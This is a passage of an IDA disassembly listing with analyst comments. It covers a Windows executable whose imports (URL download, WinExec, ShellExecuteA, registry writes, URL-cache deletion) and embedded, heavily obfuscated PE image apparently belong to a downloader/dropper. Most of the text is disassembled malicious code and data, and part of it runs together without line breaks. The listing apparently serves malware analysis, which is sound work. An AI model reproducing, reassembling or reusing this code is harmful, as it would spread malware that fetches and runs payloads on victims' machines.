sub_401682      proc near               ; CODE XREF: sub_40120B+2Dp
                                        ; sub_40120B+91p
                jmp     dword_40203C    ; IAT slot: KERNEL32.GlobalLock
sub_401682      endp


; =============== S U B R O U T I N E =======================================

; Attributes: thunk

sub_401688      proc near               ; CODE XREF: sub_40120B+5Cp
                                        ; sub_40120B+BDp
                jmp     dword_402040    ; IAT slot: KERNEL32.GlobalUnlock
sub_401688      endp


; =============== S U B R O U T I N E =======================================

; Attributes: thunk

sub_40168E      proc near               ; CODE XREF: sub_4012DD+15Cp
                                        ; sub_4012DD+177p
                jmp     dword_402044    ; IAT slot: KERNEL32.ReadFile
sub_40168E      endp


; =============== S U B R O U T I N E =======================================

; Attributes: thunk

sub_401694      proc near               ; CODE XREF: sub_4012DD+58p
                jmp     dword_402048    ; IAT slot: KERNEL32.Sleep
sub_401694      endp


; =============== S U B R O U T I N E =======================================

; Attributes: thunk

sub_40169A      proc near               ; CODE XREF: start+88p start+101p ...
                jmp     dword_402068    ; IAT slot: KERNEL32.WinExec
sub_40169A      endp


; =============== S U B R O U T I N E =======================================

; Attributes: thunk

sub_4016A0      proc near               ; CODE XREF: start+5Ap start+EAp ...
                jmp     dword_402050    ; IAT slot: KERNEL32.WriteFile
sub_4016A0      endp


; =============== S U B R O U T I N E =======================================

; Attributes: thunk

sub_4016A6      proc near               ; CODE XREF: start+20p start+B0p ...
                jmp     dword_402054    ; IAT slot: KERNEL32.lstrcatA
sub_4016A6      endp


; =============== S U B R O U T I N E =======================================

; Attributes: thunk

sub_4016AC      proc near               ; CODE XREF: sub_401127+21p
                                        ; sub_401565+C1p
                jmp     dword_402058    ; IAT slot: KERNEL32.lstrcpyA
sub_4016AC      endp


; =============== S U B R O U T I N E =======================================

; Attributes: thunk

sub_4016B2      proc near               ; CODE XREF: sub_401127+78p
                                        ; sub_401565+7Ep ...
                jmp     dword_40205C    ; IAT slot: KERNEL32.lstrlenA
sub_4016B2      endp


; =============== S U B R O U T I N E =======================================

; Attributes: thunk

sub_4016B8      proc near               ; CODE XREF: sub_40150E+51p
                                        ; sub_401565+A3p
                jmp     dword_402004    ; IAT slot: ADVAPI32.RegCloseKey
sub_4016B8      endp


; =============== S U B R O U T I N E =======================================

; Attributes: thunk

sub_4016BE      proc near               ; CODE XREF: sub_40150E+21p
                                        ; sub_401565+27p
                jmp     dword_40200C    ; IAT slot: ADVAPI32.RegCreateKeyExA
sub_4016BE      endp


; =============== S U B R O U T I N E =======================================

; Attributes: thunk

sub_4016C4      proc near               ; CODE XREF: sub_401565+4Fp
                jmp     dword_402008    ; IAT slot: ADVAPI32.RegQueryValueExA
sub_4016C4      endp


; =============== S U B R O U T I N E =======================================

; Attributes: thunk

sub_4016CA      proc near               ; CODE XREF: sub_40150E+46p
                                        ; sub_401565+98p
                jmp     dword_402000    ; IAT slot: ADVAPI32.RegSetValueExA
sub_4016CA      endp


; =============== S U B R O U T I N E =======================================

; Attributes: thunk

sub_4016D0      proc near               ; CODE XREF: sub_40120B+54p
                                        ; sub_40120B+B5p
                jmp     dword_402090    ; IAT slot: WININET.DeleteUrlCacheEntryA
sub_4016D0      endp


; =============== S U B R O U T I N E =======================================

; Attributes: thunk

sub_4016D6      proc near               ; CODE XREF: sub_40120B+18p
                                        ; sub_40120B+3Ep
                jmp     dword_40208C    ; IAT slot: WININET.FindFirstUrlCacheEntryA
sub_4016D6      endp


; =============== S U B R O U T I N E =======================================

; Attributes: thunk

sub_4016DC      proc near               ; CODE XREF: sub_40120B+7Cp
                                        ; sub_40120B+A3p
                jmp     dword_402088    ; IAT slot: WININET.FindNextUrlCacheEntryA
sub_4016DC      endp


; =============== S U B R O U T I N E =======================================

; Attributes: thunk
; IDA shows no "resolved to" name for slot dword_402078.  Presumably
; urlmon.dll!URLDownloadToFileA: the import name table later in the listing
; spells that name, and the only caller (sub_4012DD) pushes five arguments
; (0, URL, local path, 0, 0).  TODO confirm against the import directory.

sub_4016E2      proc near               ; CODE XREF: sub_4012DD+C9p
                jmp     dword_402078
sub_4016E2      endp


; =============== S U B R
O U T I N E =======================================

; Attributes: thunk
; IDA shows no "resolved to" name for slot dword_402070.  Presumably
; shell32.dll!ShellExecuteA: the only caller (sub_401127) pushes six
; arguments, among them the verb string "open", a file path and a parameter
; string.  TODO confirm against the import directory.

sub_4016E8      proc near               ; CODE XREF: sub_401127+D6p
                jmp     dword_402070
sub_4016E8      endp

; ---------------------------------------------------------------------------
                align 10h
                dd 244h dup(0)          ; zero padding up to the import address table

; Import address table.  Each dword is the address the slot held when the
; listing was produced; the "resolved to" names are IDA's.  The values are
; specific to the analysis machine's loaded DLLs -- presumably captured from
; the running, unpacked process; do not treat them as portable constants.
dword_402000    dd 77DDEBE7h            ; resolved to->ADVAPI32.RegSetValueExA
dword_402004    dd 77DD6BF0h            ; resolved to->ADVAPI32.RegCloseKey
dword_402008    dd 77DD7883h            ; resolved to->ADVAPI32.RegQueryValueExA
dword_40200C    dd 77DDEAF4h            ; resolved to->ADVAPI32.RegCreateKeyExA
                dd 0                    ; terminator of the ADVAPI32 slot list
dword_402014    dd 7C831EABh            ; resolved to->KERNEL32.DeleteFileA
dword_402018    dd 7C81CDDAh            ; resolved to->KERNEL32.ExitProcess
dword_40201C    dd 7C810A77h            ; resolved to->KERNEL32.GetFileSize
dword_402020    dd 7C80B4CFh            ; resolved to->KERNEL32.GetModuleFileNameA
dword_402024    dd 7C801EEEh            ; resolved to->KERNEL32.GetStartupInfoA
dword_402028    dd 7C814EEAh            ; resolved to->KERNEL32.GetSystemDirectoryA
dword_40202C    dd 7C8017E5h            ; resolved to->KERNEL32.GetSystemTimeAsFileTime
dword_402030    dd 7C835DCAh            ; resolved to->KERNEL32.GetTempPathA
dword_402034    dd 7C802367h            ; resolved to->KERNEL32.CreateProcessA
dword_402038    dd 7C80FC2Fh            ; resolved to->KERNEL32.GlobalFree
dword_40203C    dd 7C80FF19h            ; resolved to->KERNEL32.GlobalLock
dword_402040    dd 7C80FE82h            ; resolved to->KERNEL32.GlobalUnlock
dword_402044    dd 7C80180Eh            ; resolved to->KERNEL32.ReadFile
dword_402048    dd 7C802442h            ; resolved to->KERNEL32.Sleep
dword_40204C    dd 7C801A24h            ; resolved to->KERNEL32.CreateFileA
dword_402050    dd 7C810D87h            ; resolved to->KERNEL32.WriteFile
dword_402054    dd 7C834D41h            ; resolved to->KERNEL32.lstrcatA
dword_402058    dd 7C80BE01h            ; resolved to->KERNEL32.lstrcpyA
dword_40205C    dd 7C80BDB6h            ; resolved to->KERNEL32.lstrlenA
dword_402060    dd 7C809B47h            ; resolved to->KERNEL32.CloseHandle
dword_402064    dd 7C80FD2Dh            ; resolved to->KERNEL32.GlobalAlloc
dword_402068    dd 7C86136Dh            ; resolved to->KERNEL32.WinExec
                align 10h
; Not named by IDA; used only by thunk sub_4016E8 (see the note on that
; thunk: presumably ShellExecuteA -- TODO confirm).
dword_402070    dd 7CA40EE0h
                align 8
; Not named by IDA; the call from sub_4012DD that passes the URL and the
; local file name ends up here (presumably URLDownloadToFileA -- TODO confirm).
dword_402078    dd 42D779A3h
                align 10h
dword_402080    dd 7E41A8ADh            ; resolved
to->USER32.wsprintfA align 8 dword_402088 dd 42C2E399h ; resolved to->WININET.FindNextUrlCacheEntryAdword_40208C dd 42C2DE3Dh ; resolved to->WININET.FindFirstUrlCacheEntryAdword_402090 dd 42C45086h ; resolved to->WININET.DeleteUrlCacheEntryA align 8 dd 21A4h, 2 dup(0) dd 21C8h, 2080h, 2138h, 2 dup(0) dd 231Ch, 2014h, 2124h, 2 dup(0) dd 2370h, 2000h, 21ACh, 2 dup(0) ; --------------------------------------------------------------------------- retf 23h ; --------------------------------------------------------------------------- align 4 dd 2088h, 219Ch, 2 dup(0) dd 23ECh, 2078h, 2194h, 2 dup(0) dd 2408h, 2070h, 5 dup(0) dd 235Eh, 232Ah, 234Ah, 2338h, 0 dd 2202h, 2210h, 221Eh, 222Ch, 2242h, 2254h, 226Ah, 2284h dd 21F0h, 22A2h, 22B0h, 22BEh, 22CEh, 22DAh, 21E2h, 22ECh dd 22F8h, 2304h, 2310h, 21D4h, 2294h, 22E2h, 0 dd 23F8h, 0 dd 23D6h, 0 dd 21BCh, 0 dd 23B0h, 2396h, 237Eh, 0 dd 73770262h, 6E697270h, 416674h, 72657375h, 642E3233h dd 6C6Ch, 6C43001Ah, 4865736Fh, 6C646E61h, 300065h, 61657243h dd 69466574h, 41656Ch, 72430040h, 65746165h, 636F7250h dd 41737365h, 530000h, 656C6544h, 69466574h, 41656Ch, 78450080h dd 72507469h, 7365636Fh, 0F50073h, 46746547h, 53656C69h dd 657A69h, 65470107h, 646F4D74h, 46656C75h, 4E656C69h dd 41656D61h, 1320000h, 53746547h, 74726174h, 6E497075h dd 416F66h, 6547013Ch, 73795374h, 446D6574h, 63657269h dd 79726F74h, 1420041h, 53746547h, 65747379h, 6D69546Dh dd 46734165h, 54656C69h, 656D69h, 6547014Ah, 6D655474h dd 74615070h, 4168h, 6C470167h, 6C61626Fh, 6F6C6C41h, 16E0063h dd 626F6C47h, 72466C61h, 6565h, 6C470172h, 6C61626Fh, 6B636F4Ch dd 1790000h, 626F6C47h, 6E556C61h, 6B636F6Ch, 1F70000h dd 64616552h, 656C6946h, 2600000h, 65656C53h, 2940070h dd 456E6957h, 636578h, 7257029Eh, 46657469h, 656C69h, 736C02B5h dd 61637274h, 4174h, 736C02BBh, 70637274h, 4179h, 736C02BFh dd 656C7274h, 416Eh, 6E72656Bh, 32336C65h, 6C6C642Eh, 1800000h dd 43676552h, 65736F6Ch, 79654Bh, 65520184h, 65724367h dd 4B657461h, 78457965h, 1A30041h, 51676552h, 79726575h dd 
756C6156h, 41784565h, 1AE0000h, 53676552h, 61567465h dd 4565756Ch, 4178h, 61766461h, 32336970h, 6C6C642Eh, 0A0000h dd 656C6544h, 72556574h, 6361436Ch, 6E456568h, 41797274h dd 130000h, 646E6946h, 73726946h, 6C725574h, 68636143h dd 746E4565h, 417972h, 6946001Ah, 654E646Eh, 72557478h dd 6361436Ch, 6E456568h, 41797274h, 69770000h, 656E696Eh dd 6C642E74h, 31006Ch, 444C5255h, 6C6E776Fh, 5464616Fh dd 6C69466Fh, 4165h, 6D6C7275h, 642E6E6Fh, 6C6Ch, 68530067h dd 456C6C65h, 75636578h, 416574h, 6C656873h, 2E32336Ch dd 6C6C64h, 2FBh dup(0) dd 30303030h dword_403004 dd 905A4Dh, 3, 4, 0FFFFh, 0B8h, 0 dd 40h, 8 dup(0) dd 0F0h, 0EBA1F0Eh, 0CD09B400h, 4C01B821h, 685421CDh, 70207369h dd 72676F72h, 63206D61h, 6F6E6E61h, 65622074h, 6E757220h dd 206E6920h, 20534F44h, 65646F6Dh, 0A0D0D2Eh, 24h, 1Dh dup(0) dd 4550h, 3014Ch, 496C9E67h, 2 dup(0) dd 210E00E0h, 5010Bh, 1E00h, 800h, 0 dd 2 dup(1000h), 3000h, 10000000h, 1000h, 200h, 4, 0 dd 4, 0 dd 7000h, 400h, 10A14h, 2, 100000h, 1000h, 100000h, 1000h dd 0 dd 10h, 3670h, 0A5h, 3000h, 28h, 6 dup(0) dd 4000h, 26h, 14h dup(0) dd 7865742Eh, 74h, 2000h, 1000h, 1E00h, 400h, 3 dup(0) dd 60000020h, 6164722Eh, 6174h, 1000h, 3000h, 800h, 2200h dd 3 dup(0) dd 0C0000040h, 6C65722Eh, 636Fh, 3000h, 4000h, 200h, 2A00h dd 3 dup(0) dd 42000040h, 68h dup(0) ; --------------------------------------------------------------------------- push ebp mov ebp, esp add esp, 0FFFFFFBCh pusha lea ecx, ds:0C506E697h mov si, 0B6D7h xchg ecx, esi xchg edi, ecx add esi, 59581FE4h neg edi push 1000104Ah mov esi, 0B575150Bh neg ebx not edi xor ebx, eax not esi lea ebx, ds:15A51997h cmp edx, 95F23A39h retn ; --------------------------------------------------------------------------- dd 51DD3D8Dh, 0D4333168h, 0A29D181h, 45C72FBFh, 72654BDFh dd 72F7816Eh, 8BAFB4B4h, 8DF933D6h, 0B5BFE735h, 8BD133DFh dd 0E345C7F9h, 32336C65h, 0DBF7F633h, 858DCF81h, 0EBC14F88h dd 81D6F70Fh, 0CDEA8AFBh, 0E745C76Fh, 6C6C642Eh, 0F9ABD181h dd 0BE66DFEDh, 0C933C999h, 0EF73A1B9h, 0F129BB6Dh, 0D9F76D1Dh dd 
9533BB66h, 0EB45C6h, 5FA2C181h, 0B9667FD2h, 0CFC13F1Dh dd 141D8D02h, 661D1010h, 8D836CBAh, 2DBD740Dh, 8DDF33E9h dd 0FBBFC845h, 33CDBAD2h, 0C1D787DCh, 0E9810CC6h, 15AE5B4Ah dd 0B966DE8Bh, 0BE50036Ch, 0CDF6E0B0h, 0D8DF98Bh, 611F52A7h dd 0D1A56BAh, 0D3F790C1h, 0B9EF3D8Dh, 83B9750Ah, 8D755C3Fh dd 1468C615h, 66FD3361h, 902E1CBFh, 2DC5E281h, 0D3F7AD76h dd 0D7C1D1F7h, 20158D17h, 0BE516275h, 0D90B9185h, 0C1DF458Dh dd 0D18B0EC9h, 36B9DF33h, 507FA5E8h, 5DF5BF66h, 0E381DB33h dd 5FD5C88Bh, 0C95CFA81h, 0E9812FF6h, 0B57B4BDCh, 30AC15FFh dd 0D6C11000h, 0DAB9B912h, 0BF66CD5Ah, 8D90FAB0h, 58B8D20Dh dd 2ABA66B9h, 33D38B84h, 0C1F28BD0h, 358D12D7h, 14D8BA2h dd 54A422BFh, 0C2819015h, 0CDB05C1Fh, 0E057B966h, 0C5A2CA81h dd 0EF81E914h, 0ED69EF32h, 660FDAC1h, 66D7E1BBh, 0C1B0ABBEh dd 15FF1DC9h, 10003074h, 4C5FBB66h, 192BBA66h, 713EC281h dd 6650A14Eh, 81C924BBh, 80C410E2h, 8BDFF755h, 95DA81F3h dd 0C1B11944h, 0F79012E7h, 0BADD33D9h, 710A5A55h, 8DD1F790h dd 4735641Dh, 1BE6C135h, 7E53B966h, 52C845C7h, 0BE696765h dd 0CD932C05h, 5FBEF781h, 0F7BE3FFAh, 0BA15F29Dh, 11540428h dd 73CC45C7h, 81726574h, 2B8F01C7h, 0EB358D79h, 0C1DFE4AEh dd 3D8D15DBh, 6DF007A9h, 0BF66DEF7h, 45C7163Eh, 726553D0h dd 0C1D7F776h, 0D98709D3h, 74DF158Dh, 0BB905510h, 1029A70h dd 158DFA33h, 9FC3245Ch, 8D0ED7C1h, 0E78DDE0Dh, 5EBB90EDh dd 8BE55C76h, 8BF633F3h, 0F7FE33CFh, 0D445C7DBh, 50656369h dd 0F709DEC1h, 81D6F7D3h, 6B3CD8FFh, 0D845C779h, 65636F72h dd 0AD89BE66h, 0FA33F789h, 6618DFC1h, 73DC45C7h, 913D8D73h dd 81691251h, 558ECAF1h, 8DD6F751h, 37C48C35h, 33DFF7F5h dd 3A1D8DCEh, 338D49A4h, 0DE45C6D1h, 0E3D78100h, 877537F3h dd 9730B9DEh, 0C5BF1F9Eh, 335D4C22h, 8DDA89F5h, 0B708321Dh dd 90DAF7D5h, 6A7C7BBBh, 36BE66D1h, 90C933EEh, 8106EFC1h dd 3412B7DEh, 10D1C1F9h, 0D833D9F7h, 810AD9C1h, 9169C6C3h dd 0A015FFCFh, 8B100030h, 4E3D8DFAh, 8DD5AF57h, 0BE6F650Dh dd 0FC00BCDh, 9884h, 20BF6600h, 11C9C184h, 0D6F7D9F7h dd 60F18190h, 66FF84DFh, 0C1573ABAh, 0BF660DC1h, 0F28919F7h dd 0BB18C9C1h, 0CFA3643Bh, 6C158D90h, 8BEDCE03h, 250D8DDFh dd 
8CAFEEB4h, 9AE181C8h, 89E54E90h, 0F9E1B9CBh, 0F633D5F0h dd 7A8B5EB9h, 0AF389E1h, 42850FE4h, 0C1000000h, 0D98110DEh dd 6DD3A9F9h, 7E8AAFBBh, 63F98149h, 0C1BFAE6Ch, 0C3C102CFh db 1Ah ; --------------------------------------------------------------------------- loc_403789: ; CODE XREF: .text:004039AEj push 0 shl edi, 1Ch lea edi, ds:6D7AF1E0h neg edx mov si, 3554h call dword ptr ds:100030A4h rcr esi, 0Eh mov esi, 6DB48855h mov ebx, esi mov cx, 56E6h shr ebx, 1Dh cmp eax, 5 mov si, 2CA0h xor ebx, ebx mov di, 540Eh push 293h sub ecx, 0CD9F94A2h lea edx, ds:95ABD17Ah sub ebx, 0CDE6F76Fh add ecx, 0AD7BABDCh not ebx mov edx, 55CFA1D2h pop dword ptr [ebp-14h] xor ecx, ecx lea esi, ds:55C58EF6h lea esi, ds:913D4168h xchg edx, ecx mov cx, 5350h mov si, 0A82Ch nop or edi, 1554E8FAh rcr edi, 17h mov ecx, 1F9988F5h mov cx, 7AEDh xor edi, edi xor edi, ebp mov cx, 8C67h mov ecx, 0C9008A13h mov dword ptr [ebp-10h], 0A552254Ah mov edi, 0BD2DC480h not esi mov ecx, edx mov dx, 1172h lea edx, ds:55AE6B6Ah and edi, 6D3CAD14h push edx mov edx, esi mov di, 133Ch lea edi, ds:15C7031Ch cmp edi, 0B5549B73h not edx neg edx lea ecx, ds:0EDA8A53Eh mov ecx, ebx push eax adc esi, 1D74DDF1h mov di, 0F254h neg edx mov ebx, 0CDA6BBD7h xor edi, ecx cmp edi, 9F955E97h call dword ptr ds:10003100h xor ebx, ecx lea ebx, ds:55DA076Ah xor ecx, ebx lea ecx, ds:95F86488h cmp ebx, 3FE8FEB9h xor ecx, ebx xor edi, ecx not esi xor eax, 804B1DA8h xchg edi, ecx mov edx, 576261Fh rcr edx, 15h shr ebx, 0Ah not esi mov [ebp-0Ch], eax mov edi, ebx neg esi lea edx, ds:690ACA99h nop mov cx, 59C3h mov esi, edx shr edi, 1 nop shl ebx, 1Bh rcl edi, 13h lea ebx, ds:0C56DAAC3h ror edi, 18h mov si, 7923h mov eax, large fs:18h xor edi, esp mov esi, ecx neg ebx shl ecx, 1Eh not edi mov dx, 32D7h mov edx, 15ED3AC4h mov eax, [eax+30h] xor esi, ecx mov ecx, ebx lea ebx, ds:0B500284Eh mov ecx, edx mov bx, 82BDh lea ecx, ds:0EDA7D88Ch lea esi, ds:5FC6642Eh mov esi, edx push dword ptr [eax+2] add edi, 1FEFE212h xor edi, 0F9662396h 
mov di, 0ED63h neg edx not edi mov esi, 15A367B1h neg edi mov esi, 0EDCF9D24h push eax not edx mov si, 0F130h shl esi, 18h xor esi, edi nop xor ebx, ebx xor ebx, edx rcl esi, 3 neg edi xchg edx, edi nop add esi, 0DF993DE6h rol edx, 1Ch lea ecx, ds:39376292h lea ecx, ds:952802ABh mov edx, 0BFB6E947h adc ebx, 0D14E6B8Bh rol esi, 2 mov dword ptr [eax+2], 95959595h lea esi, ds:0CDDA479Ch neg ecx xchg esi, ebx adc ecx, 21474D16h xchg esi, ecx xor ebx, edi call dword ptr ds:10003084h xor ecx, 3FA762E7h lea edi, ds:55D92C9h mov edx, ebx mov ecx, 1962F3DCh mov ecx, edi mov edx, 15B66587h or eax, eax jz loc_403789 mov ecx, edx xor edx, edi not esi mov ah, al shl ebx, 0Ch add ebx, 55824181h lea edi, ds:0FC34B74h nop rcr ecx, 14h shr ebx, 10h sub edi, 3FFFD288h mov edx, 0BD65944Eh xchg esi, edi nop xor edx, edi lea edx, ds:192358EFh mov ebx, edi shl edx, 1Fh lea esi, ds:6FC1E242h mov esi, 0ED3523D9h ror eax, 8 xchg edx, ebx mov si, 0E859h lea edx, ds:1F84611Dh mov bx, 603Ch rcl edx, 10h mov ah, al lea ecx, ds:1FA15A62h xor ebx, esi xor edx, esi adc esi, 0BD6D7A70h sub ecx, 916B4A7Eh ror eax, 8 xor ecx, 0D5E19D00h neg edi mov ebx, ecx lea ebx, ds:0FD3E97AFh mov ah, al mov si, 7C2Ch mov di, 438Ch xchg edx, esi rol esi, 4 lea edx, ds:16FFB2Ah lea edx, ds:6DF5EE1Dh rcl edx, 0Eh mov [ebp-8], eax mov ecx, 0CD861034h mov di, 2DE4h lea esi, ds:0C53CAFBBh nop xchg esi, edx neg ebx mov cx, 8C1Ah xor ebx, ecx xor edx, edx nop rcl edx, 7 mov si, 0ED0Eh mov si, 62AEh lea edx, ds:0CDECBD9Dh mov esi, edi pop eax shl esi, 9 neg esi xor edx, 0AFDE8888h xor edx, ecx xor ecx, 39084460h not esi shl ebx, 12h mov di, 0B830h pop dword ptr [eax+2] mov edi, ecx mov edi, 0EFF69E7Ah lea edx, ds:0F527FA9Fh xor edi, ebx mov ebx, 0D5A7D73Bh xor edi, ebx lea eax, [ebp-4] lea ebx, ds:6DAE9939h lea edx, ds:0CD9E2FF7h xchg esi, ebx rol ecx, 1Dh mov ecx, edx mov ebx, 993C9711h not ebx push eax mov ecx, 0F1760C76h mov bx, 0C947h mov di, 0E450h ror ecx, 14h mov edx, esi mov edx, 7FBC0073h and edx, 517A2CBEh xor 
esi, edx push 40h rcr edi, 9 mov cx, 0B072h xchg ebx, ecx mov si, 0E416h shl ecx, 8 mov bx, 854Fh sbb esi, 15FC520Eh push 11C8h lea ecx, ds:0FFF58E35h lea ebx, ds:0FCC6C78h xor edi, ebx rcr ebx, 11h push 10001BA9h shr esi, 14h cmp ebx, 15ED9F14h mov esi, 754CBF72h xor ebx, edi mov si, 0F7A5h xor esi, 4FEAAFE3h lea edx, ds:15FCFE97h and edi, 0E1517BDDh call dword ptr ds:10003064h mov bx, 0A9E3h or edx, 9518239Dh mov ebx, 954F57B1h mov bx, 0FC7Ah mov ebx, 8FA244B4h sub edx, 0D57026ABh nop sbb ebx, 1F85664Ch neg edi mov cx, 537Ah lea edi, ds:0DD76088Dh mov esi, 6DFCE3B1h xor ebx, edx mov dx, 2443h nop or ebx, 3F8AB37Eh ror ebx, 1Ah mov edi, 0AFBB0C2Ah mov ebx, 456497AFh mov edi, esi lea eax, [ebp-3Ch] mov ebx, 2F8C1DDEh mov dx, 3DA6h xor ebx, edi xor edx, edi sbb edx, 513C6ECBh mov di, 87C2h mov ebx, esi push 0F0000000h mov dx, 63Ah and ecx, 753376C8h neg edx lea edx, ds:3FAD0D82h adc ecx, 6DC851C9h mov dx, 9917h lea esi, ds:0CD9DD5EFh push 1 xchg edx, ecx shl ecx, 9 shr edi, 10h push 0 shr edx, 0 lea ebx, ds:0D5CC23E0h rol edi, 10h mov ebx, 4D7B581Eh shr edi, 0Ah rcr edx, 14h mov di, 332Bh ror edx, 1Dh push 0 neg edx xor edx, edx xor ebx, edi xor esi, ebp xchg edi, ebx mov ebx, esi not ecx push eax mov ebx, esi rcr ecx, 17h xor ebx, esp call dword ptr ds:10003134h not esi mov cx, 909h rol ebx, 3 nop neg ebx mov edx, 9FF110FBh mov edx, esi xor edx, esp mov di, 0ECEEh nop rol edx, 0Fh mov ebx, edi xchg esi, edx mov edi, ebx xor ecx, esi sub ebx, 2119CA03h xor ebx, ebp mov ecx, 0E5614A6Fh lea eax, [ebp-40h] shr esi, 15h lea edi, ds:7F87BD6Fh mov di, 0E001h mov si, 0A6Fh and ecx, 9962EFF9h neg ecx shl ebx, 4 push eax mov ebx, 1597C47Dh not ebx rol esi, 0Dh mov esi, 0F9545332h shr edi, 0Fh lea ebx, ds:0E17893C3h push 0 shl edi, 0Dh lea ecx, ds:0CFBFAE10h neg edx xor ecx, edx push 0 lea edx, ds:0BF8017A2h xor ebx, eax mov esi, 6FAD6766h mov dx, 0ED8Ah not edi push 8003h mov bx, 0C608h lea edx, ds:49607222h xor edx, edx push dword ptr [ebp-3Ch] rol edi, 1Ah lea esi, 
ds:91104AA1h lea ebx, ds:158779C2h mov ecx, 0B17E3422h lea ebx, ds:15FDEC2Eh call dword ptr ds:10003124h lea edx, ds:0EFD67E73h shl edx, 19h xor ecx, 995B3077h not ecx nop rcl ebx, 5 mov di, 2EB9h neg ebx sbb ecx, 1F808B54h neg ebx nop add edi, 9953F4D9h shr ecx, 1Dh not ecx lea eax, [ebp-14h] lea ebx, ds:0A95C564Ah add ebx, 0D5D9B17Bh and edi, 9551A828h mov edi, 15DBBAAEh lea edx, ds:55FBB2ACh push 0 add edi, 0DFB0BEBEh xor ecx, esi xor edi, ebp mov ecx, edi mov si, 0A6C2h mov cx, 0EAFAh push 14h rol ecx, 1Bh add esi, 490EDDAAh neg esi mov ecx, edx mov bx, 106Eh push eax mov edx, 0CD87AAD9h lea esi, ds:1D54457Eh mov si, 7387h neg ecx not esi push dword ptr [ebp-40h] mov si, 0FBCDh lea esi, ds:3D7131DFh rcr edi, 15h call dword ptr ds:1000313Ch mov edi, edx lea ebx, ds:0E111D418h xor ebx, eax mov esi, ecx xor edi, ebp or ecx, 116E2CFAh neg edx xor edi, 0BD022185h nop mov ebx, 3D1782FCh xor esi, ecx mov edx, esi nop xor ebx, ebx rcr edi, 4 mov edi, 0F12AC81Eh lea edi, ds:0FF98BBCCh lea eax, [ebp-44h] rcr edi, 18h rol ebx, 1 mov ebx, edi not ecx mov bx, 9BF4h mov ecx, esi push eax lea edx, ds:1FB30AFCh lea esi, ds:496EA130h mov esi, 0CDFC194Bh lea edi, ds:0EDCA37AEh rcl edx, 1Eh lea edi, ds:0C55F2819h mov si, 1C65h mov esi, ecx push 800000h mov si, 0A683h adc edi, 0E1325841h mov edi, 1D66B8BEh rcr edi, 8 xchg esi, ecx xor edx, edi mov dx, 3A8Ch xor ecx, edx push dword ptr [ebp-40h] lea ecx, ds:0FD26B009h sbb edi, 0A131BAEFh mov esi, 796AFBA3h lea edi, ds:6122B374h push 6801h mov esi, edx mov ecx, 2FDC7CA5h not ecx lea esi, ds:5516A15Fh xor edx, esi lea ecx, ds:15ACA325h push dword ptr [ebp-3Ch] not esi xor ebx, ebx lea edi, ds:89194BF0h lea ecx, ds:215520A2h call dword ptr ds:10003138h neg ebx xor esi, edi shl ecx, 19h mov si, 4AEBh nop lea ecx, ds:0DFBC820Fh mov dx, 0DA55h mov ecx, 55BE0641h xor esi, eax and edx, 0C97B99D6h nop mov ebx, edi xor ecx, esi mov si, 677Eh push 11C8h rol edx, 8 mov edi, esi mov di, 11C8h mov edx, ecx push esp xor edx, edi lea esi, 
ds:8926F406h neg esi xor ecx, ebx push 10001BA9h neg esi neg edx lea ebx, ds:0E121DA04h rcl ecx, 4 adc edi, 0F12C3396h sbb edx, 895B42F8h mov esi, ecx neg ecx push 0 mov bx, 909h neg ecx xor esi, 5D7EF129h shr edi, 6 mov ecx, 1FD8F26Fh shl edx, 0Fh lea ecx, ds:492D2AB8h shl esi, 1 push 1 lea ecx, ds:0A9334693h rol esi, 1Fh sub ebx, 0D5C21F54h xor esi, 0E521B989h mov ecx, 0CDF7065Dh mov edi, 0D17BB42Dh xor edx, edx push 0 neg ebx xor ecx, 6FAE4637h rcl esi, 4 xor ebx, ebx xchg ebx, ecx neg ecx push dword ptr [ebp-44h] xor ecx, edi neg esi lea ebx, ds:4D0D9F9Eh xor ecx, esi call dword ptr ds:10003164h add esp, 4 mov esi, ecx cmp ecx, 114B2059h rcr edx, 4 shl esi, 8 not esi lea ebx, ds:0E9441552h sbb esi, 391F4B02h nop rol edi, 0Dh lea ecx, ds:9F8BAF1Fh adc esi, 7F8AB104h not ebx mov edx, edi shl edx, 18h neg edi nop mov dx, 2586h mov si, 464h mov bx, 8AB5h shl esi, 6 loc_403FA2: ; CODE XREF: .text:00403FB7j neg ecx neg ebx popa leave loc_403FA8: ; CODE XREF: .text:00403FB5j jmp $+5 ; --------------------------------------------------------------------------- db 0CDh, 41h, 0E5h ; --------------------------------------------------------------------------- jnp short loc_404024 and al, [eax+5Ah] jb short loc_403FA8 jge short loc_403FA2 and esi, eax ror byte ptr [ebp-423A3763h], 1 mov al, 42h retn ; --------------------------------------------------------------------------- dd 0EA37A21Ah, 0C67441D1h, 0A9E45968h, 67712550h, 1671ACBh dd 62BD92BAh, 84E4695Ch, 0B3F4FAAFh, 0C50DC974h, 0A4459988h ; --------------------------------------------------------------------------- leave loc_403FED: ; CODE XREF: .text:00404069j push ecx mov eax, ds:7C695DBCh retn 8E19h ; --------------------------------------------------------------------------- aDsPe_NZimvC db 'DPe.<mV',0 db 0F6h ; --------------------------------------------------------------------------- retf ; --------------------------------------------------------------------------- db 5Bh, 12h, 80h dd 7AA58D3Eh, 0F3CA24EDh, 
59943705h, 4AD9D83Dh, 4148D4B4h dd 0E79E054Ch ; --------------------------------------------------------------------------- loc_404024: ; CODE XREF: .text:00403FB0j push ecx into cmp ebx, [ebx] or edi, [edi-2Ch] pushf and ch, [ecx] and [edx], esi db 67h, 26h rep mov ch, 5 inc ebp mov bl, 2Bh inc esp xchg dl, ah lodsb xchg eax, ecx out dx, al add al, 0BAh lock or eax, esp in al, dx pop ebx cmp [ebx-68EB4020h], ch imul ebx, [ebx-1Dh], 5184042Dh out dx, eax neg dword ptr [eax+57994C8Bh] ; CODE XREF: .text:00404061j xchg dl, [eax] ; CODE XREF: .text:00404063j in eax, 6Ch mov ah, 7Fh push es dec ebp jle short near ptr loc_404053+2 jns short near ptr loc_404059+1 sub ebx, [edx] jp short loc_40406E jg short loc_403FED pop esp cdq xchg eax, edx loc_40406E: ; CODE XREF: .text:00404067j imul eax, [edx-7ABBB196h], 0EF7385E1h xor al, [ecx+ebx*2-7D41F51h] mov ebx, ss pop es ; --------------------------------------------------------------------------- dw 66DBh dd 8E586FEEh, 870BD3CFh, 0EA69ED7Dh, 0F1295DDh, 0B207E647h dd 0C7C7E901h, 14B59044h, 5237EAFDh, 0AFFCD089h, 0FE7D50DAh dd 0EECE7BDFh, 0CB6143EAh, 22CA3401h, 8203C3ACh, 0BA497FAAh dd 3AE3FA62h, 5BE7131Dh, 232A22Ch, 9089B8D8h, 7C584CA5h dd 42763DF4h, 0F10EE7B8h, 0D053FE77h, 0F9195520h, 76053275h dd 4FC3874Fh, 